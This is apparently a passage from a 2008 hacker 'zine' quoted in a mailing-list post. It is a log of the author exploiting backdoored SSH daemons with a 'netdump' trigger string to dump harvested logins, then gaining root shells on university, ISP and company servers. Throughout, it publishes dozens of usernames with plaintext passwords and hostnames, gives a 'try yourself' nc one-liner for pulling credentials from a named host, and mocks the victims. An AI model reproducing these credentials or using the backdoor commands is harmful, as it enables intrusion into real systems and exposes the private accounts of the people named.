> SSH2_OUT: 10.0.0.227 <http://10.0.0.227> user: pmco pass: druida99 (complex000.if.uff.int <http://complex000.if.uff.int>) > SSH2_OUT: 10.0.0.231 <http://10.0.0.231> user: alan pass: ck37=2x > > > SSH2_OUT: 10.0.0.231 <http://10.0.0.231> user: root pass: slacksucks! > SSH2_OUT: 10.0.0.231 <http://10.0.0.231> user: root pass: slacksucks! (urania.if.uff.int <http://urania.if.uff.int>) > > > SSH2_OUT: 10.0.0.246 <http://10.0.0.246> user: bernardo pass: (damasco.if.uff.int <http://damasco.if.uff.int>) > SSH2_OUT: 10.0.0.246 <http://10.0.0.246> user: bernardo pass: truthno1 (damasco.if.uff.int <http://damasco.if.uff.int>) > > > SSH2_OUT: 10.0.0.247 <http://10.0.0.247> user: jssm pass: Jujaja (gould.if.uff.int <http://gould.if.uff.int>) > SSH2_OUT: 10.0.0.44 <http://10.0.0.44> user: tgmattos pass: CAMtgm&7 > > > SSH2_OUT: 10.0.0.60 <http://10.0.0.60> user: fsilveira pass: Instituto > SSH2_OUT: 10.0.0.60 <http://10.0.0.60> user: fsilveira pass: VaiPasSar > > SSH2_OUT: 10.0.0.75 <http://10.0.0.75> user: davidvaz pass: 2o3145 (DOAS-Laptop.if.uff.int <http://DOAS-Laptop.if.uff.int>) > > SSH2_OUT: 10.0.0.78 <http://10.0.0.78> user: alan pass: ck37=2x (urania.if.uff.int <http://urania.if.uff.int>) > SSH2_OUT: 10.0.0.93 <http://10.0.0.93> user: pmco pass: druida99 (urubu.if.uff.int <http://urubu.if.uff.int>) > > > SSH2_OUT: 10.0.0.93 <http://10.0.0.93> user: pmco pass: druidruida99 (urubu.if.uff.int <http://urubu.if.uff.int>) > SSH2_OUT: 10.0.0.97 <http://10.0.0.97> user: critter pass: 559832 (ronaldinho.if.uff.int <http://ronaldinho.if.uff.int>) > > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > central@...sec [~xoxox/h3h3] # telnet 203.161.120.230 <http://203.161.120.230> 22 > > > Trying 203.161.120.230... > Connected to 203.161.120.230 <http://203.161.120.230>. > Escape character is '^]'. > SSH-2.0-OpenSSH_4.3 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> letmein > > > pass_from: 58.7.216.153 <http://58.7.216.153> user: root pass: @pixar87 (dsl-58-7-216-153.wa.westnet.com.au <http://dsl-58-7-216-153.wa.westnet.com.au>) -> h3h3, sorry pal. > > > > central@...sec [~xoxox/h3h3] # ssh root@....161.120.230 <mailto:root@....161.120.230> > root@....161.120.230 <mailto:root@....161.120.230>'s password: > > > ----- no skynet ------- > > Last login: Tue Aug 12 19:32:36 2008 from dsl-58-7-216-153.wa.westnet.com.au <http://dsl-58-7-216-153.wa.westnet.com.au> > > zeus:~# > zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet > Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux > 15:27:04 up 104 days, 6:19, 1 user, load average: 0.00, 0.02, 0.00 > > > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > inet addr:203.161.120.230 <http://203.161.120.230> Bcast:203.161.120.255 <http://203.161.120.255> Mask:255.255.255.240 <http://255.255.255.240> > > > inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link > inet addr:11.11.11.3 <http://11.11.11.3> Bcast:11.255.255.255 <http://11.255.255.255> Mask:255.255.255.0 <http://255.255.255.0> > > > > zeus:/usr/include/linux# ./sheader /usr/include/linux/byteorder/ssh.h|sort|uniq|more > SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: michael pass: @pixar87 > SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: michael pass: dh0st1ngd > > > SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: michael pass: ruup2it > SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: root pass: @pixar87 > SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: admin pass: @pixar87 > > > SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: admin pass: emaildivers > SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: admin pass: jugg3r0 > SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: root pass: @pixar887 > > > SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: root pass: jugg3r0 > pass_from: 10.10.10.129 <http://10.10.10.129> user: root pass: @pixar87 > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > central@...sec [~xoxox/h3h3] # telnet 207.145.66.12 <http://207.145.66.12> 22 > Trying 207.145.66.12... > Connected to 207.145.66.12 <http://207.145.66.12>. > > Escape character is '^]'. > > SSH-2.0-OpenSSH_4.7 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> smack > pass_from: 24.218.192.76 <http://24.218.192.76> user: root pass: cl1pt3xt (c-24-218-192-76.hsd1.ma.comcast.net <http://c-24-218-192-76.hsd1.ma.comcast.net>)-> sorry bro > > > pass_from: 75.68.31.152 <http://75.68.31.152> user: gman pass: 0xc0ffee (c-75-68-31-152.hsd1.nh.comcast.net <http://c-75-68-31-152.hsd1.nh.comcast.net>) -> >:( > > > central@...sec [~xoxox/h3h3] # ssh root@....145.66.12 <mailto:root@....145.66.12> > > root@....145.66.12 <mailto:root@....145.66.12>'s password: > > Last login: Wed Aug 6 23:25:38 2008 from 189.4.184.201 <http://189.4.184.201> --------->>>>>>>>>>>>>>>>>>>>>>>>> quick question, who's that ? > > > --------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that make you sad? i mean, wtf... > > > > d4:~# > d4:~# uname -a;w;/sbin/ifconfig -a|grep inet > Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686 GNU/Linux > 03:36:51 up 68 days, 4:58, 0 user, load average: 1.88, 1.80, 1.74 > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > > > inet addr:207.145.66.12 <http://207.145.66.12> Bcast:207.145.66.255 <http://207.145.66.255> Mask:255.255.255.0 <http://255.255.255.0> > > inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > central@...sec [~xoxox/h3h3] # telnet 212.111.196.163 <http://212.111.196.163> 22 > > > Trying 212.111.196.163... > Connected to 212.111.196.163 <http://212.111.196.163>. > Escape character is '^]'. > SSH-2.0-OpenSSH_4.7 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE PASSWORD ! > > > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: x4rtuhg6 (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed you, localhost. > > > pass_from: ::ffff:10.66.10.111 <http://10.66.10.111> user: root pass: dihlordifenil --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;( > > > > central@...sec [~xoxox/h3h3] # ssh root@....111.196.163 <mailto:root@....111.196.163> > root@....111.196.163 <mailto:root@....111.196.163>'s password: > > > Last login: Fri Aug 8 19:49:52 2008 from 189.4.161.222 <http://189.4.161.222> ------------>>>>>>>>>>>>>> lets laugh for a while now > > > > **** Connected to **** > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > #### ### #### ### # #### ## > > > ### #### ## ##### ## ## > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > **** Linux users 2.6.23-gentoo i686 **** > > > > root@...rs:~# > root@...rs:~# uname -a;w;/sbin/ifconfig -a|grep inet > Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET 2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux > 10:49:08 up 171 days, 22:37, 1 user, load average: 0.20, 0.24, 0.21 > > > USER TTY LOGIN@ IDLE JCPU PCPU WHAT > root pts/0 10:46 0.00s 0.44s 0.00s w > inet addr:192.168.253.3 <http://192.168.253.3> Bcast:192.168.253.255 <http://192.168.253.255> Mask:255.255.255.0 <http://255.255.255.0> > > > inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link > inet addr:169.254.78.132 <http://169.254.78.132> Bcast:169.254.255.255 <http://169.254.255.255> Mask:255.255.0.0 <http://255.255.0.0> > > > inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0 <http://255.0.0.0> > inet6 addr: ::1/128 Scope:Host > inet addr:212.111.196.163 <http://212.111.196.163> Bcast:212.111.196.191 <http://212.111.196.191> Mask:255.255.255.224 <http://255.255.255.224> > > > inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link > inet addr:212.26.143.6 <http://212.26.143.6> Bcast:212.26.143.7 <http://212.26.143.7> Mask:255.255.255.252 <http://255.255.255.252> > > > inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > > central@...sec [~xoxox/h3h3] # telnet 212.143.216.226 <http://212.143.216.226> 22 > Trying 212.143.216.226... > Connected to 212.143.216.226 <http://212.143.216.226>. > > Escape character is '^]'. > > SSH-2.0-OpenSSH_4.3 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> im getting tired of this. > > > pam_from: 62.219.238.196 <http://62.219.238.196> user: root pass: QWERFcxz (mail2.tikalnetworks.com <http://mail2.tikalnetworks.com>) ----->>>>>>>> no kidding. > > > > central@...sec [~xoxox/h3h3] # ssh root@....143.216.226 <mailto:root@....143.216.226> > root@....143.216.226 <mailto:root@....143.216.226>'s password: > > > jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet > > Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686 Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel GNU/Linux > 09:58:11 up 3 days, 18:03, 1 user, load average: 1.29, 1.16, 1.08 > USER TTY LOGIN@ IDLE JCPU PCPU WHAT > > > root pts/0 09:34 16:19 0.32s 0.30s ssh 10.0.0.3 <http://10.0.0.3> > inet addr:10.0.0.253 <http://10.0.0.253> Bcast:10.0.0.255 <http://10.0.0.255> Mask:255.255.255.0 <http://255.255.255.0> > > > inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0 <http://255.0.0.0> > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > > central@...sec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 <http://143.107.133.103> 22|grep OUT > SSH2_OUT: 143.107.133.38 <http://143.107.133.38> user: wlscopel pass: va1513zb (feynman.if.usp.br <http://feynman.if.usp.br>) > > > SSH2_OUT: 143.107.133.233 <http://143.107.133.233> user: pdborges pass: mipa0529 (aegir.if.usp.br <http://aegir.if.usp.br>) > SSH2_OUT: 143.106.42.243 <http://143.106.42.243> user: luana pass: 103174b (athenas.cna.unicamp.br <http://athenas.cna.unicamp.br>) > > > SSH2_OUT: 143.107.133.8 <http://143.107.133.8> user: kpp pass: fth6mdy (landauer.if.usp.br <http://landauer.if.usp.br>) > SSH2_OUT: 143.107.133.47 <http://143.107.133.47> user: luana pass: 103174b (schroedinger.if.usp.br <http://schroedinger.if.usp.br>) > > > SSH2_OUT: 143.107.133.76 <http://143.107.133.76> user: mvarella pass: CH3Ftri (planck.if.usp.br <http://planck.if.usp.br>) > SSH2_OUT: 143.107.133.38 <http://143.107.133.38> user: wlscopel pass: va1513zb (feynman.if.usp.br <http://feynman.if.usp.br>) > > > SSH2_OUT: 143.107.133.47 <http://143.107.133.47> user: cedric pass: KunD1cka (schroedinger.if.usp.br <http://schroedinger.if.usp.br>) > > central@...sec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 <http://143.107.133.103> 22|grep from|grep -v bullshit > > > pass_from: 143.107.133.244 <http://143.107.133.244> user: hmf18 pass: xpx9b15+ (turista.if.usp.br <http://turista.if.usp.br>) > pass_from: 201.52.218.156 <http://201.52.218.156> user: cedric pass: P1chona04 (c934da9c.virtua.com.br <http://c934da9c.virtua.com.br>) > > > pass_from: 201.82.105.213 <http://201.82.105.213> user: mfsoares pass: 3p1t@xy (c95269d5.virtua.com.br <http://c95269d5.virtua.com.br>) > pass_from: 189.34.88.209 <http://189.34.88.209> user: kpp pass: mdc6gpt (bd2258d1.virtua.com.br <http://bd2258d1.virtua.com.br>) > > > pass_from: 189.102.19.167 <http://189.102.19.167> user: pontes pass: r@...9* (bd6613a7.virtua.com.br <http://bd6613a7.virtua.com.br>) > pass_from: 189.102.98.126 <http://189.102.98.126> user: lassali pass: las2008ro (bd66627e.virtua.com.br <http://bd66627e.virtua.com.br>) > > > > > > central@...sec [~xoxox/h3h3] # ssh root@....107.133.103 <mailto:root@....107.133.103> 'uname -a' > root@....107.133.103 <mailto:root@....107.133.103>'s password: > > > Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007 x86_64 x86_64 x86_64 GNU/Linux > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > central@...sec [~xoxox/h3h3] # telnet 200.144.186.37 <http://200.144.186.37> 22 > > > Trying 200.144.186.37... > Connected to shark.lcca.usp.br <http://shark.lcca.usp.br> (200.144.186.37 <http://200.144.186.37>). > Escape character is '^]'. > > SSH-2.0-OpenSSH_4.3 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> k from now on, no more netdump messages > > > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> just got tired, u knoW > > > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: amazonas pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im almost stopping pasting stuff > > > > -> alot of kool shit regarding usp.br <http://usp.br> here > try yourself-> echo netdump|nc 200.144.186.37 <http://200.144.186.37> 22|grep usp.br <http://usp.br> > > or just grep OUT > > > kthxnpurwelcome > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > central@...sec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 <http://200.145.203.74> 22|grep localhost > > > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: ArmY1*00 (localhost) ->>>>>>>>>>>>>>>>> im glad you are here :) kind of makes it easy > > > > central@...sec [~xoxox/h3h3] # ssh root@....145.203.74 <mailto:root@....145.203.74> > root@....145.203.74 <mailto:root@....145.203.74>'s password: > > > Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br <http://nemo.df.ibilce.unesp.br> > > > **** Connected to **** > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > #### ### #### ### # #### ## > > > ### #### ## ##### ## ## > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > **** Linux hobbes 2.6.18-6-686 i686 **** > > > > root@...bes:~# > root@...bes:~# uname -a;w;/sbin/ifconfig -a|grep inet > Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux > 05:47:44 up 27 days, 15:12, 1 user, load average: 0.21, 0.15, 0.06 > > > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > rico :0 - 06Aug08 ?xdm? 5:39 0.71s x-session-manager > inet addr:200.145.203.74 <http://200.145.203.74> Bcast:200.145.203.255 <http://200.145.203.255> Mask:255.255.255.0 <http://255.255.255.0> > > > inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link > inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0 <http://255.0.0.0> > inet6 addr: ::1/128 Scope:Host > > root@...bes:~# > > > central@...sec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 <http://200.145.203.74> 22|grep unesp > pass_from: 200.145.203.42 <http://200.145.203.42> user: rico pass: so31fia12 (nemo.df.ibilce.unesp.br <http://nemo.df.ibilce.unesp.br>) > > > SSH2_OUT: 200.145.203.42 <http://200.145.203.42> user: ronaldo pass: LANmu80 (nemo.df.ibilce.unesp.br <http://nemo.df.ibilce.unesp.br>) > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > > central@...sec [~xoxox/h3h3] # telnet 67.15.56.12 <http://67.15.56.12> 22 > Trying 67.15.56.12... > Connected to 67.15.56.12 <http://67.15.56.12>. > Escape character is '^]'. > > SSH-1.99-OpenSSH_3.9 > > netdump > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: l3nny1nt3l (localhost) > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: lenny pass: l3nny1nt3l (localhost) > > > pass_from: 76.188.180.141 <http://76.188.180.141> user: joe pass: 1207j0s3ph7ys0n9813 (cpe-76-188-180-141.neo.res.rr.com <http://cpe-76-188-180-141.neo.res.rr.com>) > > pass_from: 76.188.180.141 <http://76.188.180.141> user: devel pass: ha1W0;rlD.0121 (cpe-76-188-180-141.neo.res.rr.com <http://cpe-76-188-180-141.neo.res.rr.com>) > > > pass_from: 76.188.180.141 <http://76.188.180.141> user: celtrust pass: 1207j0s3ph9813 (cpe-76-188-180-141.neo.res.rr.com <http://cpe-76-188-180-141.neo.res.rr.com>) > > > > > central@...sec [~xoxox/h3h3] # ssh root@...15.56.12 <mailto:root@...15.56.12> > > root@...15.56.12 <mailto:root@...15.56.12>'s password: > > Last login: Tue Aug 12 00:51:58 2008 from c-98-234-65-222.hsd1.ca.comcast.net <http://c-98-234-65-222.hsd1.ca.comcast.net> > > > > **** Connected to **** > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > #### ### #### ### # #### ## > > > ### #### ## ##### ## ## > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > **** Linux f1.celtrust.com <http://f1.celtrust.com> 2.6.9-34.ELsmp i686 **** > > > > [root[@f1 ~]# > [root[@f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet > Linux f1.celtrust.com <http://f1.celtrust.com> 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux > > 05:20:15 up 153 days, 9:30, 0 users, load average: 2.62, 1.27, 0.63 > > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > inet addr:67.15.56.12 <http://67.15.56.12> Bcast:67.15.57.255 <http://67.15.57.255> Mask:255.255.254.0 <http://255.255.254.0> > > > inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link > inet addr:67.15.57.240 <http://67.15.57.240> Bcast:67.15.57.255 <http://67.15.57.255> Mask:255.255.255.0 <http://255.255.255.0> > > > inet addr:67.15.57.241 <http://67.15.57.241> Bcast:67.15.57.255 <http://67.15.57.255> Mask:255.255.255.0 <http://255.255.255.0> > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > central@...sec [~xoxox/h3h3] # ssh root@...119.174.19 <mailto:root@...119.174.19> > root@...119.174.19 <mailto:root@...119.174.19>'s password: > > > > > **** Connected to **** > > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > #### ### #### ### # #### ## > ### #### ## ##### ## ## > > > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > **** Linux res1.van.metrobridge.net <http://res1.van.metrobridge.net> 2.6.18-5-686 i686 **** > > > > root@...1:~# > root@...1:~# uname -a;w;/sbin/ifconfig -a|grep inet > Linux res1.van.metrobridge.net <http://res1.van.metrobridge.net> 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux > > 12:54:34 up 315 days, 17:40, 4 users, load average: 0.58, 0.35, 0.27 > > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > sky pts/0 66.119.176.2 <http://66.119.176.2> 11:41 1:12 0.00s 0.00s -bash > sky pts/3 66.119.176.2 <http://66.119.176.2> Tue15 20:53 0.18s 0.00s sshd: sky [priv] > > > sky pts/6 66.119.176.2 <http://66.119.176.2> 11:42 1:10 0.16s 0.01s sshd: sky [priv] > vee pts/7 74.221.143.3 <http://74.221.143.3> 12:23 28:41m 0.07s 0.00s telnet seton-3550 > > > inet addr:66.119.174.4 <http://66.119.174.4> Bcast:66.119.174.15 <http://66.119.174.15> Mask:255.255.255.240 <http://255.255.255.240> > > inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link > > inet addr:66.119.174.29 <http://66.119.174.29> Bcast:66.119.174.31 <http://66.119.174.31> Mask:255.255.255.240 <http://255.255.255.240> > > inet addr:65.39.152.235 <http://65.39.152.235> Bcast:65.39.152.255 <http://65.39.152.255> Mask:255.255.255.224 <http://255.255.255.224> > > > inet addr:65.39.152.237 <http://65.39.152.237> Bcast:65.39.152.255 <http://65.39.152.255> Mask:255.255.255.224 <http://255.255.255.224> > > inet addr:66.119.174.19 <http://66.119.174.19> Bcast:66.119.174.31 <http://66.119.174.31> Mask:255.255.255.240 <http://255.255.255.240> > > > inet addr:65.39.152.239 <http://65.39.152.239> Bcast:65.39.152.255 <http://65.39.152.255> Mask:255.255.255.224 <http://255.255.255.224> > > inet addr:66.119.174.3 <http://66.119.174.3> Bcast:66.119.174.15 <http://66.119.174.15> Mask:255.255.255.240 <http://255.255.255.240> > > > inet addr:66.119.174.2 <http://66.119.174.2> Bcast:66.119.174.15 <http://66.119.174.15> Mask:255.255.255.240 <http://255.255.255.240> > > > pass_from: 66.119.176.2 <http://66.119.176.2> user: simon pass: pass77 (mail.metrobridge.com <http://mail.metrobridge.com>) [whole metrobridge with the same pass] > > > pass_from: 66.119.176.2 <http://66.119.176.2> user: sky pass: rotoFro7 (mail.metrobridge.com <http://mail.metrobridge.com>) [whole metrobridge with the same pass] > > > have fun > > > - what a shame.. again, metrobridge ? i told you to keep on eye on your sshd since your zine :( > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > > central@...sec [~xoxox/h3h3] # ssh root@....239.200.102 <mailto:root@....239.200.102> > root@....239.200.102 <mailto:root@....239.200.102>'s password: > > > Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br <http://stml030.microlink.com.br> > > Linux 2.6.11.12-ul1. > > **** Connected to **** > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > > > #### ### #### ### # #### ## > ### #### ## ##### ## ## > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > > > **** Linux proxy2-rj 2.6.11.12-ul1 i686 **** > > root@...xy2-rj:~# > root@...xy2-rj:~# uname -a;hostname -f;w > Linux proxy2-rj 2.6.11.12-ul1 #1 Tue Aug 30 12:40:56 BRT 2005 i686 unknown > proxy2-rj.pop-rio.com.br <http://proxy2-rj.pop-rio.com.br> > > > 17:14:22 up 97 days, 5:09, 0 users, load average: 2.16, 1.88, 1.76 > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > root@...xy2-rj:~# > root@...xy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq > > > pass_from: 200.239.245.50 <http://200.239.245.50> user: root pass: Beth01@ (gwpr03.microlink.com.br <http://gwpr03.microlink.com.br>) > pass_from: 200.239.245.70 <http://200.239.245.70> user: root pass: pa$$w0rd (Froes.microlink.com.br <http://Froes.microlink.com.br>) > > > root@...xy2-rj:~# ./sshread mac.h|grep OUT > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: BuCaaAadd (localhost) -----> /me laughs > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > > central@...sec [~xoxox/h3h3] # ssh root@....107.250.214 <mailto:root@....107.250.214> > root@....107.250.214 <mailto:root@....107.250.214>'s password: > > > Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br <http://143-107-55-100.iq.usp.br> > > > ..... !! HELLO WORLD !! ..... > > @@@@@@ @@@@@@ > @@ @@ @@ @@ > > > @@ @@ @@ @@@ @@ @@ @@ @@@ @@ @@ > @@ @@ @@ @ @@ @@ @@ @@ @ @@ @@ @@ > IIII II I II IIII II I II IIII > IIII III II IIII III II IIII > > > II II II II II II II II II II > II II IIIIII II II IIIIII II II > **** Linux noelrosa.iq.usp.br <http://noelrosa.iq.usp.br> 2.6.9-42.0.10.EL x86_64 **** ->>>> new kool motd, n1cE rIpZ > > > > [root[@noelrosa ~]# > > <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT We g0T tiReD oF pAstIng StUfF lIkE thAT >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> > > > -;;;;;;; i think thats enough to paste, right ? > -;;;;;; anyway, in the end/bottom of this 'zine' there is a file to download with some of the ip's that weve got from them > > -/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW -/-/-/-/-/-/-/-/-/-/ > > > > r47 is r47@...ckh47.org <mailto:r47@...ckh47.org> * i own u! [and We own you!] > r47 on @#combat #osiris @#/<-rad > r47 using irc.ipv6.he.net <http://irc.ipv6.he.net> Hurricane Electric IPV6 IRC Server > > > r47 actually using host 2001:470:1f15:42b::3 > r47 End of /WHOIS list. > > central@...sec [~xoxox/h3h3] # ssh root@...ckh47.org <mailto:root@...ckh47.org> -p 2222 bash > > root@...ckh47.org <mailto:root@...ckh47.org>'s password: .niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz <http://casablanca.cz/eurosignal.cz>) > > > uname -a;w;hostname -f > Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007 i686 GNU/Linux > 10:13:26 up 162 days, 8:25, 0 users, load average: 0.04, 0.05, 0.01 > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > > > VoIP.eurosignal.cz <http://VoIP.eurosignal.cz> > > sit0 Link encap:IPv6-in-IPv4 > inet6 addr: ::10.0.2.254/96 <http://10.0.2.254/96> Scope:Compat > > inet6 addr: ::127.0.0.1/96 <http://127.0.0.1/96> Scope:Unknown > > inet6 addr: ::10.0.2.4/96 <http://10.0.2.4/96> Scope:Compat > inet6 addr: ::77.78.84.242/96 <http://77.78.84.242/96> Scope:Compat > UP RUNNING NOARP MTU:1480 Metric:1 > > > RX packets:0 errors:0 dropped:0 overruns:0 frame:0 > TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:0 > RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) > > > > sit1 Link encap:IPv6-in-IPv4 > inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global > inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global > inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global > > > inet6 addr: 2001:470:1f15:42b::5/64 